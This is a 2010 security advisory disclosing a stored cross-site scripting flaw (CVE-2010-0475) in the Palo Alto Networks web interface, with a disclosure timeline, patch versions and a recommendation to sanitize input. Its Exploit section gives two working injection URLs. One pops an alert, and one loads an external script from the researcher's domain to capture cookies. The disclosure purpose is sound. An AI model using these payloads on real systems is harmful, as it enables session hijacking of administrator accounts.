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Palo Alto Network Cross Site Scripting

Palo Alto Network Cross Site Scripting
Posted May 14, 2010
Authored by Jeromie Jackson

Palo Alto Network suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2010-0475
SHA-256 | 3d0c6671fe43e34bdd0787218ccfb7f63893f06919773d0ff6b4725c89c700ec

Palo Alto Network Cross Site Scripting

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Class:     Cross-Site Scripting (XSS) Vulnerability
CVE: CVE-2010-0475
Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response: 2/18/2010
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
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Validated Vulnerable:
Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.


Exploit:
Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>

&admin-role=%5Bobject+Object%5D&bSubmit=O



WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O


Solution:
A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet
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